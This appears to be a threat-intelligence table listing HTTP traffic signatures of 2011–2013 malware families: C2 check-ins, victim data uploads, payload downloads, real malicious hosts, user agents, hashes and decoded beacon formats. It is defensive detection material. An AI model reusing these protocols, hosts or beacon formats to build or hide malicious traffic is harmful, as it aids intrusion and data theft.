174 | 2013-04-28 | APT | Banechant 1 | GET | /IGKKT | /IGKKT | Accept: 1 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0. 50727) Host: ow.ly Connection: Keep-Alive . . . . Error 301, implicitly redirects to malicious site HTTP/1.1 301 Moved Permanently Date: Fri, 15 Mar 2013 16:31:20 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5. 3. 2-1ubuntu4. 18 set-cookie: OWLYSID=f6f604d22494a738706d64353e3536d91c5d69e1; path=/ | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0. 50727) | http://www.fireeye.com/blog/technical/malware-research/2013/04/trojan-apt-banechant-in-memory-trojan-that-observes-for-multiple-mouse-clicks.html | 2013-04 | |||||||
175 | 2013-04-28 | APT | Banechant payload dl 2 | GET | /adserv/logo.jpg HTTP /1.1 | /logo.jpg | Accept: image/jpeg User-Agent:Mozilla/4.0 (compatible; MS1E 6.0; Windows NT 5.1; Sv2) Connection: Keep-Alive host: . symbisecure.com | Mozilla/4.0 (compatible; MS1E 6.0; Windows NT 5.1; Sv2) | http://www.fireeye.com/blog/technical/malware-research/2013/04/trojan-apt-banechant-in-memory-trojan-that-observes-for-multiple-mouse-clicks.html | 2013-04 | |||||||
176 | 2013-04-28 | APT | Beebus | GET | /windosdate/v6/default.aspx?ln=en-us | /v6/default.aspx?ln=en-us | User-Agent: Mozilla/4.0 (compatible; ) Accept: / Host: update.microsoft.com Cookie: WC1=V=3&GUID=afe1e295d3c94b2ca137abc405a63a57 | Mozilla/4.0 (compatible; ) | Beebus initialrequest | http://www.fireeye.com/blog/technical/targeted-attack/2013/02/operation-beebus.html | 2013-02 | ||||||
177 | 2013-04-28 | APT | Beebus C2 checkin | GET | /s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZge NAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 | /s/asp?XAAAAM | /s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 User-Agent: Mozilla/4.0 (compatible; ) Accept: / Host: 68.96.31.136 | Mozilla/4.0 (compatible; ) | Beebus C2 checkin | d7ec457be3fad8057580e07cae74becb | http://www.fireeye.com/blog/technical/targeted-attack/2013/02/operation-beebus.html | http://contagioexchange.blogspot.com/2013/08/beebus-warp-strings-apt.html | 2011-09 | ||||
178 | 2013-04-28 | APT | Beebus C2 checkin | GET | /s/asp?XAAAAM4w5jmOS_kMZlr67o8jettxsYA8d ZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 | /s/asp?XAAAAM | User-Agent: Mozilla/4.0 (compatible; ) Accept: / Host: bee.businessconsults.net | Mozilla/4.0 (compatible; ) | Beebus C2 checkin | 7ed557921ac60dfcb295ebabfd972301 | http://www.fireeye.com/blog/technical/targeted-attack/2013/02/operation-beebus.html | http://contagioexchange.blogspot.com/2013/08/beebus-warp-strings-apt.html | 2011-04 | ||||
179 | 2013-04-28 | APT | Beebus data send | POST | /s/asp?__ uLBwO1bAMKBgG2BQAAAAEAAAACAAAAAAAAAG9zYW11 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA VwBJAE4ARABPAFcAUwBNAEEAQQBOAEU AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAA==p=2 | /s/asp?__u | User-Agent: Mozilla/4.0 (compatible; ) Accept: / Host: Content-Length: 563 Connection: Keep-Alive Cache-Control: no-cache | Mozilla/4.0 (compatible; ) | Beebus data send | http://contagioexchange.blogspot.com/2013/08/beebus-warp-strings-apt.html | |||||||
180 | 2013-04-28 | CRIME EK | Blackhole 2 | GET | /fded177fe12651bb038f3f11b01c4168/q.php | /q.php | /fded177fe12651bb038f3f11b01c4168/q.php Accept: text/html, application/xhtml+xml, / Referer: http://www.jobs-located-near.com/Lanoka%20Harbor/NJ/08734/Internship/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: 193.93.248.227 Connection: Keep-Alive | victim UA | compromised site - malwertizing on www.jobs-located-near.com redirect to BH landing page via iframe | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_blackhole-exploit-kit.pdf http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | 2013-04 | ||||||
181 | 2013-04-28 | APT | Cookies /Cookiebag / Dalbot | GET | /1799.asp | /1799.asp | Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: usnftc.org Connection: Keep-Alive Cookie: CAQGBgoFD1YaHA4ZH1AIBwIOBR8ADhJWWV5bX1ADBBgfBQoGDlYmKic8KjkuIz4lPy45UA== 'command=qwert;clientkey=2504;hostname=MALWAREHUNTER;' | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) | Decoded string is shown in Figure 8, where the decoded string includes the command request, the clientkey (which is a decimal value selected at program startup), and the compromised host’s name. | 0C28AD34F90950BC784339EC9F50D288 | http://intelreport.mandiant.com/ | http://bit.ly/aptpcaps | http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-2.html http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-1.html | 2012-08 | |||
182 | 2013-04-28 | APT | Cookies /Cookiebag / Dalbot | GET | /3961.html Cookie: Y29tbWFuZD1HZXRDb21tYW5kO2NsaWVudGtle T0zOTU0 O2hvc3RuYW1lPXZpY3RpbTs= | Cookie: Y29tbWFuZD1HZXRDb21tYW5kO2NsaWVudGtleT0zOTU0O2hvc3RuYW1lPXZpY3RpbTs= User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Host: 216.62.168.251:8080 Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; | 8080 | 2c4cabb4ca19ddf87c7f11bad44bdf05 | http://www.cyberengineeringservices.com/trojan-cookies/ | http://bit.ly/aptpcaps | http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-2.html http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-1.html | 2011-09 | ||||
183 | 2013-04-28 | APT | Cookies /Cookiebag / Dalbot | GET | /8223.asp (also can be like /2007.asp,/2013.asp etc | <p>/8223.asp <p>/2007.asp <p>/2013.asp | /8223.asp Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Host: 1.234.1.68 Connection: Keep-Alive Cookie: CAQGBgoFD1YaHA4ZH1AIBwIOBR8ADhJWU1pcXlADBBgfBQoGDlYDCgUeDgcORgkIXVtcWVtQ | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) | 9b6692295fadf24b512d5f63e4f74d15 | http://labs.alienvault.com/labs/index.php/2012/unveiling-a-spearphishing-campaign-and-possible-ramifications/ | http://bit.ly/aptpcaps | http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-2.html http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-1.html | 2012-10 | ||||
184 | 2013-04-28 | APT | Cookies /Cookiebag / Dalbot | GET | /indexs.zip | /indexs.zip | /indexs.zip Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) Host: 117.55.241.58 Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | 840BD11343D140916F45223BA05ABACB | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/aptpcaps | http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-2.html http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-1.html | 2012-01 | ||||
185 | 2013-04-28 | APT | Coswid | GET | /old/google.png | /google.png | Accept: . . . . . , User-Agent: [redacted] fcfea+Mozilla/4.0 (compatible; MSIE 8.0; win32) Host: firstwillnessclub.com | [redacted] fcfea+Mozilla/4.0 (compatible; MSIE 8.0; win32) | 726ef24b8eff4c4121c73861756fb9a3 a4ba6540520c375875bf46cf8e19cb7d 09fd067b6d944bf111857f6f60b7471e | http://labs.alienvault.com/labs/index.php/category/blog/snort-blog/page/2/ | http://contagioexchange.blogspot.com/2013/08/coswid-strings-apt.html | 2012-05 | |||||
186 | 2013-04-28 | APT | CVE-2012-0754 SWF in DOC | GET | /test.mp4 | Accept: / Accept-Language: en-US x-flash-version: 11,1,102,55 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1) Host: 208.115.230.76 Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1) | SWF request | E92A4FC283EB2802AD6D0E24C7FCC857 | http://contagiodump.blogspot.com/2012/03/mar-2-cve-2012-0754-irans-oil-and.html | 2012-05 | ||||||
187 | 2013-04-28 | APT | CVE-2012-0779 | GET | /essais.swf?info=789c333230d13331d53337d63 3b3b432313106001afa0338&infosize=00FC0000 | /essais.swf? | Accept: / User-Agent: contype Host: 204.45.73.69 | contype | 1750A38A44151493B675538A1AC2070B | http://contagiodump.blogspot.com/2012/05/may-3-cve-2012-0779-world-uyghur.html | 2012-05 | ||||||
188 | 2013-04-28 | CRIME | Darkmegi | GET | /20111230.jpg | /20111230.jpg | /20111230.jpg Host: images.hananren.com User-Agent: Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR+2.0.50727) Cache-Control: no-cache | Mozilla/4.0+(compatible;+MSIE+6.0; +Windows+NT+5.1;+SV1;+ .NET+CLR+2.0.50727) | 6C8F9658A390C24A9F4551DC15063927 | http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html | 2012-04 | ||||||
189 | 2013-04-28 | CRIME | Darkness DDos v8g | GET | /index.php?uid=587609&ver=8g%20XP | /index.php?uid= | /index.php?uid=587609&ver=8g%20XP HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Host: vkotalke.info Pragma: no-cache | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) | F03Bc8Dcc090607F38Ffb3A36Ccacf48 | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/crimepcaps | 2011-01 | |||||
190 | 2013-04-28 | APT | Depyot | GET | /new/3d/d/pdf.php?id=2 | /3d/d/pdf.php?id= | /new/3d/d/pdf .php?id=2 HTTP/1. 1 User-Agent: Mozilla/4.0 (compatible) Host: www.3dvideo. ru Cache-Control: no-cache | Mozilla/4.0 (compatible) | stage 1 payload | 651fad35d276e5dedc56dfe7f3b5f125 | http://www.fireeye.com/blog/technical/targeted-attack/2013/03/internet-explorer-8-exploit-found-in-watering-hole-campaign-targeting-chinese-dissidents.html | 2013-03 | |||||
191 | 2013-04-28 | APT | Destory Rat / Sogu / Thoper | POST | /update?id=000f6b50 | /update?id= | /update?id=000f6b50 Accept: / X-Session: 0 X-Status: 0 X-Size: 61456 X-Sn: 1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR1.0.3705) Host: exchange.likescandy.com Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; . NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR | 09B8B54F78A10C435CD319070AA13C28 | http://labs.alienvault.com/labs/index.php/2012/the-connection-between-the-plugx-chinese-gang-and-the-latest-internet-explorer-zeroday/ | 2012-09 | ||||||
192 | 2013-04-28 | APT | Destory Rat / Sogu / Thoper | POST | /update?id=3109c2a2 | /update?id= | /update?id=3109c2a2 Accept: / X-Session: 0 X-Status: 0 X-Size: 61456 X-Sn: 1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;) Host: path.alyac.org Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1; | Both variants are associated with the Destory RAT family of malware that dates back at least as far as January 2007 | http://www.commandfive.com/papers/C5_APT_C2InTheFifthDomain.pdf | 2012-02 | ||||||
193 | 2013-04-28 | APT | Destory Rat / Sogu / Thoper | POST | /update?product=windows | /update?product=windows | /update?product=windows Accept: / X-Session: 0 X-Status: 0 X-Size: 61456 X-Sn: 1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1; | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1; | Update communications The format of Variant A is identical to the communications generated by the Destory RAT used in the SK Communications hack http://www.commandfive.com/papers/C5_APT_SKHack.pdf | http://www.commandfive.com/papers/C5_APT_C2InTheFifthDomain.pdf | 2012-02 | ||||||
194 | 2013-04-28 | CRIME | DirtJumper DDoS | POST | /678/index.php | /index.php | /678/index.php HTTP/1.0 Host: asdaddddaaaa.com Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Content-Type: application/x-www-form-urlencoded Content-Length: 17 k=426924814555748 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | 2011-10 | |||||||
195 | 2013-04-28 | CRIME | Dirtjumper ddos | POST | /boi854tr4w.php | /boi854tr4w.php | /boi854tr4w.php HTTP/1.0 Host: coppercreek.ru Accept: / Accept-Encoding: identity, ;q=0 Content-Length: 269 Connection: close Content-Type: application/octet-stream Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) | Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) | http://blog.shadowserver.org/page/3/ | 2012-08 | |||||||
196 | 2013-04-28 | CRIME | DNSChanger | POST | /d56sc1d56scd56sc1.php?ini= v22Mmjy0SYXyWTI0tQ0QQOdqOb68 J9I6ModWQnN1eE1VXw/T3BWOyTujBlrHIQqMgMqV75 0QegiB MF4XAHPzbYqRtufQpaX/M/trvO7ukg== | /d56sc1d56scd56sc1.php?ini=v22Mmjy0SYXyWTI0tQ0QQOdqOb68J9I6ModWQnN1eE1VXw/T3BWOyTujBlrHIQqMgMqV750QegiBMF4XAHPzbYqRtufQpaX/M/trvO7ukg== Content-Type: application/x-www-form-urlencoded Host: borderspot.net User-Agent: Mozilla/6.0 (Windows; w3.0) Content-Length: 193 Connection: close Cache-Control: no-cache data=qSrTzGL0RMCyDnY9+xJEQe5nNLundsMqfdgBGzUoJ0xVTU/DzQWC3DLbXB/UfETT1o6F2ZIbLEGVJ0MOJTSDP9PX4aSS/OagY6143bGp0y/uGVSLVL0u+uo+x5NraqI7DJaKGg7TCqXkTszGInUBxiK1/hKL2oFYpjsSeY04x+zt2a9dO+UI5VhP0W45 | Mozilla/6.0 (Windows; w3.0) | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/crimepcaps | 2011-12 | |||||||
197 | 2013-04-28 | APT | Downloader BMP | GET | /images/evil.bmp | /evil.bmp | /images/evil.bmp User-Agent: Mozilla/4.0 (compatible; MSIE 8.0 ;Windows NT 6.1; U.S. ) 4IRh2K1I3Zl=O Host: www.badsite4you.com Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 8.0 ;Windows NT 6.1; U.S. ) | See the article: The data in red is hard coded into the sample’s binary. The data that is highlighted in yellow is the encoded host name (in this example: victim). Original Encoded String - 4IRh2K1I3Zl Decoded String - D+LJDbLR Letters Switched - R+LJDbLD Decoded String - victim | d166a59e71535a42267e9fa993ca8e7e | http://www.cyberengineeringservices.com/downloader-bmp/ | 2012-05 | |||||
198 | 2013-04-28 | APT | Einstein | GET | /gttfi.php?id=019451425260376469&ext =YmFkc3R1ZmYuZGxs | /gttfi.php?id= | / gttfi.php?id=019451425260376469&ext=YmFkc3R1ZmYuZGxs User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: family.mobwork.net Connection: Keep-Alive Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) | 1c2dfd36ad8cad978a0859d459f10326 | http://www.cyberengineeringservices.com/trojan-matryoshka-and-trojan-einstein/ | 2011-08 | ||||||
199 | 2013-04-28 | APT | Einstein data send | POST | /gttfi.php?id=019451425260376469& ext=ixioJXXJFCRrrDatKHhK | /gttfi.php?id= | / gttfi.php?id=019451425260376469&ext=ixioJXXJFCRrrDatKHhK Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: family.mobwork.net Content-Length: 420 Connection: Keep-Alive Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) | send filename if exists | 1c2dfd36ad8cad978a0859d459f10326 | http://www.cyberengineeringservices.com/trojan-matryoshka-and-trojan-einstein/ | 2011-08 | |||||
200 | 2013-04-28 | CRIME EK | EK - Blackhole 2 landing | GET | /news/default-php-version.php?mdm=30:1g:2v:1f:1o& xguc= 3b:3i:39: 35&nze=1l:1f:30:1l:2v:30:1m:2v:1n:30&bhn=lixvdd | /default-php-version.php?mdm= | Accept: / Accept-Language: en-US Referer: http://autorepairgreeley.info/news/default-php-version.php x-flash-version: 10,1,53,64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Host: autorepairgreeley.info Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/crimepcaps | 7/27/2013 | ||||||
201 | 2013-04-28 | CRIME EK | EK Blackhole 1 | GET | /showthread.php?t=d7ad916d1c0396ff | /showthread.php?t= | Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1) Host: 88.85.99.44:8080 Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1) | 8080 | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/crimepcaps | 2012-03 | |||||
202 | 2013-04-28 | CRIME EK | EK Phoenix | GET | /navigator/jueoaritjuir.php | /jueoaritjuir.php | Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, / Accept-Language: ru Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: 78.83.233.242:8080 Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | 2012-04 | |||||||
203 | 2013-04-28 | APT | Enfal / Lurid | GET | /oi2c/wlc3/ [reducted]:00-00-00-00-00-00/ij83d | /wlc3/ | Host: home. coffeeibus . com Cache-Control: no-cache | New Enfal checks if commands have been specified | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf | http://bit.ly/aptpcaps | 2012 | ||||||
204 | 2013-04-28 | APT | Enfal / Lurid | GET | /trandocs/nm/.[reducted] :00-00-00-00-00-00lCrrrwhite | /nm/ | Host: note.webmail-temp.com Cache-Control: no-cache | Enfal checks if commands have been specified | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf | http://bit.ly/aptpcaps | 2012 | ||||||
205 | 2013-04-28 | APT | Enfal / Lurid | POST | /cgi-bin/CMS_SubitAll.cgi | /CMS_SubitAll.cgi | Host: virustotel.3-a.net Content-Length: 115 Cache-Control: no-cache | New EnfalPOSTs the victim’s details to the C&C server | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf | http://bit.ly/aptpcaps | 2012 | ||||||
206 | 2013-04-28 | APT | Enfal / Lurid | POST | /cgl-bin/Owpq4.cgi | /Owpq4.cgi | Host: note.webmail-temp.com Content-Length: 83 Cache-Control: no-cache | posts the victim’s details to the C&C server | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf | http://bit.ly/aptpcaps | 2012 | ||||||
207 | 2013-04-28 | APT | Enfal / Lurid | POST | /Sjwpc/odw3ux | Host: hone.coffeeibus.com Content-length: 104 Cache-Control: no-cache | Original EnfalPOSTs the victim’s details to the C&C server | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf | http://bit.ly/aptpcaps | 2012 | |||||||
208 | 2013-04-28 | CRIME | Flashback OSX | GET | /statistics.html | /statistics.html | Host: cuojshtbohnt.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1; sv:2; id: 1A698BE9-0211-5EB4-AFDC-644AA479D972) Gecko/20100101 Firefox/9.0.1 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1; sv:2; id: 1A698BE9-0211-5EB4-AFDC-644AA479D972) Gecko/20100101 Firefox/9.0.1 | 5616687FAC5D040AE65CB1B08717A6AA | http://contagiodump.blogspot.com/2012/04/i-have-been-tracking-infections-too-and.html | 2012-04 | ||||||
209 | 2013-04-28 | APT | Foxy | POST | /404error.asp | /404error.asp | Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0) Host: www.gobroadreach.com Content-Length: 53 Connection: Keep-Alive Cache-Control: no-cache | Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0) | d271ae0f4e9230af3b61eafe7f671fde | http://www.cyberengineeringservices.com/364/ | 2011-08 | ||||||
210 | 2013-04-28 | APT | Foxy Checkin | GET | /images/leftnav_prog_bg.jpg | /leftnav_prog_bg.jpg | User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0) Host: www.gobroadreach.com Cache-Control: no-cache | Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0) | d271ae0f4e9230af3b61eafe7f671fde | http://www.cyberengineeringservices.com/364/ | 2011-08 | ||||||
211 | 2013-04-28 | APT | Gh0st ASP ver | GET | /1/v2/1oginv2.asp?hi2wsdf351&x.’..[xf)..<.3XqHr....)IL{..&y192.168.0.69 | /v2/1oginv2.asp? | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0: Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1) Host: .palms-us.org | Mozilla/4.0 (compatible; MSIE 6.0: Windows NT 5.1; SV1; .NET CLR | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf | 2012 | |||||||
212 | 2013-04-28 | APT | Gh0st PHP ver | GET | /ld/queenfun/vl /login.php?cd2hpdGU&uU11T VEV&s&pMTkyLjE2OC4wljYS&hi2wsdf35l | /queenfun/vl /login.php? | HTTP/1 .1 User-Agent: Mozilla/4.0 (compatible; ) Accept: / Host: . ibmunion.net | Mozilla/4.0 (compatible; ) | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf | 2012 | |||||||
213 | 2013-04-28 | APT | Gh0st v2000 var | n | v2010........f...............( ......Service Pack 2..?..|...|...|0.@.. | v2010 | v2010........f...............( ......Service Pack 2..?..|...|...|0.@..............4$..............4$..^.....|.....]...]......{l....$.0%.|.....a2.rSingleO....t.....2.........d ....j.DELLXT..............................................g...00-50-56-3C-F6-41...'....... | B1D09374006E20FA795B2E70BF566C6D | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/aptpcaps | 2012-08 | ||||||
214 | 2013-04-28 | APT | GoogleAdC2 | GET | /html/lost.html | /lost.html | Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) Host: news.googleupdateservices.com Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) | The Trojan parses the HTML file data for the following content: <!-- google_adINSTRUCTION height --> So, an example of what file lost.html may contain may look like this: <!-- google_adad_heighthttp://www.reallybad.com/Trojan2.jpg height --> | 90993b5279365b204148e8b04edf477f | http://www.cyberengineeringservices.com/cve-2011-0609-payload-a-exe-analysis/ | 2011-11 | |||||
215 | 2013-04-28 | APT | GoogleAdC2 2nd stage | GET | /Trojan2.jpg | /Trojan2.jpg | Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) Host: www.reallybad.com Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) | The downloaded file is expected to be Base64 encoded using the following custom alphabet: abhijstuDEFGHIvwxynopqr5678QRS9+/TUzklmVWXYZABCJKLMNOP01cdefg234 | 90993b5279365b204148e8b04edf477f | http://www.cyberengineeringservices.com/cve-2011-0609-payload-a-exe-analysis/ | 2011-11 | |||||
216 | 2013-04-28 | APT | Googles | GET | /sll/monica.jpg | /monica.jpg | User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; =1j2CVh2s#IE6DBo6Iru; MNA) Host: www.avvmail.com Cache-Control: no-cache | Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; Mozilla/4.0(compatible;WindowsNT5.1; MSIE8.0) Mozilla/4.0(compatible;WindowsNT5.1; MSIE7.0;Trident/4.0 | GOGGLES will periodically request a pre-configured URL, which contains encoded commands to either sleep or download and execute another URL.The GOGGLES downloader makes extensive use of data encoding and encapsulation to obscure network traffic. GOGGLES is designed to request a URL that is stored encoded in its resource section and then extract and decode a second URL from the data returned from the server.The first HTTPrequest’s User-Agent string will include the encoded name of the local system. Below is an example of the first HTTPrequest: | BF80DBF969B73790253F683CD723FD71 | http://intelreport.mandiant.com/ | 2009-07 | |||||
217 | 2013-04-28 | APT | Greencat | GET | /<HOSTNAME>/ | GET /<HOSTNAME>/ HTTP/1.1 Accept: / Pragma: no-cache Cache-Control: max-age=0 Cache-Control: no-cache Connection: Keep-Alive Computer: <HOSTNAME> User-Agent: Mozilla/4.0 Host: flash.aunewsonline.com Content-Length: <ContentLength> <HOSTNAME> Connected! | Mozilla/4.0 Mozilla/4.0(compatible;MSIE8.0; WindowsNT5.1;SV1) Mozilla/5.0 Mozilla/4.0 | GREENCAT communicates using SSL. Within the SSL tunnel the initialrequest | 57e79f7df13c0cb01910d0c688fcd296 | http://intelreport.mandiant.com/ | 2012-04 | ||||||
218 | 2013-04-28 | APT | Gtalk | GET | /facebook.png | /facebook.png | Accept: / Pragma: no-cache Cache-Control: max-age=0 Cache-Control: no-cache Connection: Keep-Alive Computer: <HOSTNAME> User-Agent: Mozilla/4.0 Host: flash.aunewsonline.com Content-Length: <ContentLength> <HOSTNAME> Connected! | [redacted] +Mozllla/4.0 (compatible; MSIE 8.0; Win32) | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf | 2012 | |||||||
219 | 2013-04-28 | Hacktivism | HOIC DDoS | GET | / HTTP/1.0 | Accept: / Accept-Language: en Host: www.hoic_target_site.com | http://blog.spiderlabs.com/2012/01/hoic-ddos-analysis-and-detection.html | 2012-01 | |||||||||
220 | 2013-04-28 | CRIME | Imaut | GET | /setting.doc | /setting.doc | Host: www.yahoo.com Cache-Control: no-cache | 823e9bab188ad8cb30c14adc7e67066d | http://bit.ly/crimepcaps | ||||||||
